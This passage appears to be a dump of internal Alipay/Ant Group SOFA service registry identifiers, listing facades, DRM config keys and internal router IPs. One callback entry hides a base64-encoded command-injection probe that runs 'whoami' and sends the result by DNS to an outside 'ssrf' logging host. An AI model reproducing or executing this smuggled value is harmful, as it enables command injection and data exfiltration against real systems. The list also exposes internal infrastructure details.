@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.VerifyCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.meta.DimensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exratecenter.service.facade.api.ExFinancialDataFileMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.topic.TopicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.claim.notify.InsNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.MerchantTagConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:imtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.dsdb.biz.service.HealthGiftCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmembermng.common.service.facade.generalconfig.GeneralDataSourceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.certifymngTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.service.facade.quality.ArgoQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.GrayAoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelPartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.split.common.service.facade.api.SplitCommandValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.product.service.ReservationProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.27.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.prod.EbppInstAuthConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.starWishloadDataTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.biz.sign.facade.SignContractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.AttributeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.BizTypeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.assets.AssetsReplacementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.investtrade.facade.api.option.OptionFairValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.service.flow.RunInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.brandshop.api.BrandShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:packageApplyProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsandbox.service.facade.openAcess.ISVManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessAutoAssignCallbackNew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.AssetAllocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.switchs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tiyubiz.sport.rpc.api.venue.VenueListRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.systems,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zhimago_merchant_notify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_ANTACP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanApplyBackendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.MediaTagServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.LimitCaseVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.oasis.common.service.facade.gateway.GatewayTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.spcenter.facade.bd.BdProspectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.biz.shared.batch.BatchOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_SECURITY_INTL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestprod.facade.system.DataMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","exriskcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.content.facade.ContactMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.PublicSqlOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.IntentionTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeInitAdjustRateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.common.user.service.ChainNodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.biz.shared.listener.handler.UniformEventHandler:1.0:snsCampPrizeUniformEventHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.imatchSpaceCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbatch.comm.service.facade.accept.FinbatchSeqService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.15.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.140.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.prod.ZhouZhouLeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.crm.common.facade.api.CustomerRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbcateringprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IStreamStatLogRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.discount.common.service.facade.group.GroupCodeManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.MallMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.TestAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.clientAvailabel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.client.drm.ClientCacheRefreshSwitcher.refreshCacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlogmng.common.service.facade.tinyapp.TinyAppEventTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.MobileBiometricSilenceOpenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.facereserve.AsynReferenceService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.baseinfo.EpBaseComQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.event.TEventManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ReconModeDrmResource.change,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.paycore.PmtRfdModeStyCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.lineage.LineageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileanti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpFatigueApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.checkerQueryTimeOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdiscountprod.common.service.facade.voucher.api.VoucherBatchExpireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.material.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.NearConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_RECRUITCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.api.IndexSignalFixDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmTransfrontFailoverSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SystemTaskManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.dept.DeptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.shadowModelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.user.api.SecuVipUserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.2.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.call.BPCall:1.0:dataCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.dcep.DcEpInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:ALI_MERCHANTCARD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.TransferModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.antfinancial.antchain.cloud.endpoint.facade.RestManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassetcore.common.service.assetcore.facade.CommonUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.142.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.amberdata.metadata.service.MetadataColumnConfigService:1.0:metadataColumnConfigService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:exchangecore_dealTicketProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.biz.direct.exception.DirectHandleExceptionCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:authprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkstmtcore.common.service.facade.statement.loan.LoanTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ofpgrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datatrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.InstSignQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.template.MessageTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.service.DeviceInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:mydds@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.app.AppAdminManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.TransferQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.manage.facade.api.PlayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.FundQuotFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkdeviceinfo.common.service.facade.device.AutoLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.myreports.DataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custcenter.service.facade.authorization.AuthorizationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.content.CommonContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.service.CouponAuthorizedReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.dataclean.forum.hbase.daointerface.QaCommunityCleanHAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frgcenter.common.service.facade.api.VirtualTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.manage.GroupRulesConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.AgdsCreditCenterOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.Plugin:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.category.api.InsCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.FinnetInfluxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.fundcard.FundCardDepositGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.coupon.service.OfflineServiceTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.biz.customresourceclient.FederatedResourceService:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igadaptor.common.service.facade.OauthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cGluZyBgd2hvYW1pYE16TXdNalE0TmprdExURXdOREF3TXpBek1nLnNzcmYubm9ibGUubG9nLmx5bm5zaGFyZS5jYw==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.dataaccess.StandardDataAccessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acrescore.facade.AbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.common.service.facade.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.getway.service.PlaybackDataGateWay:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payboss.onestop.engine.OnestopEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zbdm.common.service.facade.lineage.LineageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilelink.common.service.facade.ConnectionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminAppCatFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.BudgetWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifpdop.externalfacade.service.IfpdopTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.realtimequota.RealTimeQuotationIncrementDataListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.common.service.facade.CampQueryMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.mng.MerchantTagConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_mobileCfgDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.LeadsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-emccenter-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alifi.aegis.service.loan.InterestSettleService:1.0.0:dubboInterestSettleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.meta.service.LocalCacheManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.report.facade.api.RccenterAccessControlFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.cdp.CdpQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.ToolResourceDrm.pclrMessageEvent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.common.service.facade.paascore.ClusterResourceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MIDAS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revtrans.common.service.facade.api.CompanyInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mfinpromo.common.service.facade.equity.EquityInfoRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprod.common.service.facade.FundPurchaseCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zscale.api.ZscaleCommunicatePlugin:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.businesstype.api.BusinessTypeMapQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insthemis.service.facade.dispatch.DispatchJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.ItemFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:fccustprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicore.common.service.facade.miniapp.api.AppInfoQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mytradeapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.publishSleepTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.176.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apires_antAuditTaskNodeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CustomerRoleInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityidentify.service.privacyquestion.UnifyPrivacyQuestionQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.criskcenter.common.service.facade.strategycore.ComplianceStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.34.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.amspm.ardd.common.support.drm.AmspmSystemFuncDrmResource.closeMd5Check,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.api.SendInvoiceFileForEmailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.giftprod.amy.service.facade.GiftQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promocenter.facade.api.CommandActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.ironman.IronmanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.ClusterModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.CodeInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.client.drm.AntPassportSwitcher.readFromAntPassportRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.d9721.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:sccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.point.PointSendBizConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.openapi.OperationRecordOpenApi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antgraph.facade.GraphSimulationConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aeicore.common.service.facade.EntrustAssetAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCommandLfuCacheDrm.needCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.guardianconsole.facade.configs.service.Guar